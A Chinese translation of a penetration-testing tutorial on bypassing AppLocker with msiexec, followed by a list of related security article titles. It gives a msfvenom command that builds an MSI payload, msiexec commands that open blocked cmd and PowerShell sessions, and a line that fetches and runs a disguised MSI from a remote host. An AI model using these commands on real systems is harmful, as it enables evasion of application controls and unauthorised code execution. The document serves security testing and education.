繞過AppLocker系列之MSIEXEC的利用
MSIEXEC是Windows操作系統中的一個實用程序,可用於從命令行安裝或配置產品。 如果環境配置不正確,則使用.MSI文件就可以允許攻擊者執行許可權升級或繞過AppLocker規則。 本文的以下內容表明,當系統配置為不阻止所有用戶執行MSI文件時,那麼系統就得不到正確的保護,因為任何一個AppLocker的可執行規則都可以輕鬆繞過。
可以使用Metasploit 的MsfVenom來生成用於執行命令或有效載荷的.MSI文件。
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.msi
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 199 bytes
Final size of msi file: 159744 bytes
使用 MsfVenom 生成 MSI 文件
運行powershell.msi 將會打開一個PowerShell會話,這樣就可以繞過AppLocker的規則了,即使已經設置了所有用戶都不可以執行PowerShell。
利用MSIEXEC 運行 PowerShell
同樣可以利用這種方式運行cmd命令,即使Windows系統已經阻止了cmd命令的執行。
msiexec /quiet /i cmd.msi
執行上述命令後,就會彈出cmd的窗口。
另外,msiexec實用程序還可以運行已經重命名過的MSI文件,比如重命名為PNG的MSI文件。 這些文件可以在命令提示符中本地執行或從遠程執行,當然也可以繞過AppLocker規則執行。
msiexec /q /i http://192.168.100.3/tmp/cmd.png
利用MSIEXEC執行PNG文件,彈出cmd
上述操作同樣可以用在Meterpreter payload 執行MSI文件上。
利用MSI 執行 Meterpreter Payload
利用MSIEXEC獲得Meterpreter 會話
本文翻譯自
https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/
點擊展開全文
※子域名枚舉、探測工具AQUATONE 使用指南
※NSA泄漏工具Esteemaudit 補丁簡要分析
※為了更有效率地偷錢,Android root木馬開始試水簡訊扣費詐騙
※Windows Server中的 WINS 伺服器遠程內存損壞漏洞分析
TAG:嘶吼RoarTalk |
※繞過CloudFlare WAF和OWASP CRS 3核心規則集
※WhatsApp發現隱私漏洞,允許用戶繞過iOS端的Touch ID或Face ID
※使用Burpsuite擴展Hackvertor繞過WAF並解密XOR
※自動化系統再次繞過Google reCAPTCHA
※繞過nftables/PacketFilter防火牆過濾規則傳輸ICMP/ICMPv6數據包的漏洞詳解(上)
※Facebook、谷歌繞過APP Store收集用戶信息,蘋果竟放小扎一馬
※利用metasploit繞過UAC的5種方式
※手把手教你使用PowerShell繞過AppLocker
※如何利用PowerShell診斷腳本執行命令並繞過AppLocker
※Win10.net UMCI安全繞過0-day漏洞,POC已公開
※powershell中使用ReflectivePEInjection繞過殺毒
※Blood:UCH-L1繞過mTOR促進蛋白質合成和MYC誘導型淋巴瘤的發生
※CobaltStrike-用「混淆」繞過Windows防火牆
※XSS繞過filter高級技術 part1
※Grayshift或已找到繞過iOS12 USB限制模式方法
※Cellebrite可繞過運行iOS 11設備的安全防護,包括當前的iPhone X
※ASWCrypter:該工具生成的Payload可以繞過目前所有的反病毒產品
※使用AutoHotkey和Excel中嵌入的惡意腳本來繞過檢測
※繞過OLED 三星明年推出家用Micro LED電視
※使用PowerShell腳本執行命令並繞過AppLocker;Ruby CVE-2017-17405 分析